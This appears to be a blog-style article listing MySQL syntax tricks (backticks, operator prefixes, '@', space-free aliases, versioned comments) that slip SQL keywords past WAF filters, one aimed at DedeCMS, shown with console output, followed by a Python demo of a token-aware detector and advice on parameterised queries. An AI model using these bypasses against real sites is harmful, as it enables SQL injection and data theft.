In this article I will share several WAF bypass tricks. The ones everyone already knows, such as `/*! */` and the whitespace substitutes in `SELECT[0x09, 0x0A-0x0D, 0x20, 0xA0]xx FROM`, are not repeated here.
MySQL:
Tip 1: the magic backtick ` (note how it shows up in the column header of the output table). It can stand in for a space and gets past some regular expressions.
```
mysql> select`version`()
    -> ;
+----------------------+
| `version`()          |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)
```
A more interesting technique: this backtick can also act as a comment marker, cutting off the rest of the condition.
```
mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
```
Usage: `where id ='0'`'xxxx`, where everything from the backtick onwards is treated as a comment.
Tip 2: the magic `-`, `+` and `.`:
```
mysql> select id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)
```
Why does this matter? Some filters do not match the bare keyword but a space followed by the keyword (for example ` from`); that is exactly what the trick above removes.
Tip 3: `@`
```
mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+
```
This bypasses the DedeCMS filter.
The following also works:
Tip 4: a MySQL column alias (`function() as xxx`) needs neither `as` nor a space:
```
mysql> select-count(id)test from qs_admins;
+------+
| test |
+------+
|   -1 |
+------+
1 row in set (0.00 sec)
```
Tip 5: the `/*![>5000] */` version comment. The version number does not have to be current; an old one is still accepted:
```
mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
```
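The common thread of Tips 1 to 5 is that the MySQL lexer does not need whitespace between a keyword and a backtick, an operator, `@`, a parenthesis or a version-comment marker, so a signature that looks for "keyword plus space" never sees the keyword. The following Python check is an added example, not code from the article: it runs a whitespace-dependent toy rule and a token-aware rule over the query shapes shown above (sample strings, rule names and the `normalize` helper are all constructed for this demo, and the helper only covers the quirks the article shows, not the full MySQL grammar).

```python
import re

# Constructed sample inputs: the query shapes from Tips 1-5 plus two benign
# strings that a keyword rule must not flag.
SAMPLES = {
    "tip1_backtick":        "select`version`()",
    "tip2_operators":       "select+id-1+1.from qs_admins",
    "tip3_at":              "select@^1.from qs_admins",
    "tip4_alias":           "select-count(id)test from qs_admins",
    "tip5_version_comment": "/*!40000select*/ id from qs_admins",
    "benign_word":          "selected items: 3",
    "benign_plain":         "qs_admins",
}

# Toy signature of the kind the article defeats: the keyword must be followed
# by whitespace. An assumption for this demo, not a rule taken from any real WAF.
NAIVE_RULE = re.compile(r"\bselect\s", re.IGNORECASE)


def naive_flags(q: str) -> bool:
    """Whitespace-dependent keyword rule: misses every tip in the article."""
    return NAIVE_RULE.search(q) is not None


# Characters the MySQL lexer treats as token boundaries even without whitespace.
# The article shows ` + - @ . ( ) in that role; ^ ; , = are added here.
BOUNDARY = re.compile(r"([`+\-@.()^;,=])")


def normalize(q: str) -> str:
    """Approximate MySQL tokenisation so keywords become bare tokens.

    Covers only the quirks the article demonstrates; a production detector
    would need a real SQL lexer.
    """
    # /*!NNNNN ... */ is executed by MySQL: keep the body, drop the markers
    q = re.sub(r"/\*!\d*", " ", q)
    q = q.replace("*/", " ")
    # pad boundary characters so keyword and punctuation become separate tokens
    q = BOUNDARY.sub(r" \1 ", q)
    return re.sub(r"\s+", " ", q).strip().lower()


SQL_KEYWORDS = {"select", "from", "union", "where"}


def keywords_found(q: str) -> set:
    """Keyword tokens present after normalisation (empty set for benign input)."""
    return {t for t in normalize(q).split() if t in SQL_KEYWORDS}


def token_flags(q: str) -> bool:
    """Token-aware rule: flags a SELECT token regardless of what surrounds it."""
    return "select" in keywords_found(q)


def compare_rules(samples=SAMPLES) -> dict:
    """Per sample name: (naive verdict, token-aware verdict)."""
    return {name: (naive_flags(q), token_flags(q)) for name, q in samples.items()}


if __name__ == "__main__":
    for name, (naive, tok) in compare_rules().items():
        print(f"{name:22s} naive={naive!s:5s} token_aware={tok}")
```

Running it shows `naive=False token_aware=True` for all five tip shapes and `False`/`False` for the benign strings. Keyword matching on raw input stays a heuristic even when tokenised, which is why the durable fix on the application side is parameterised queries; a WAF signature is at best a second layer that has to reason about tokens, not spaces.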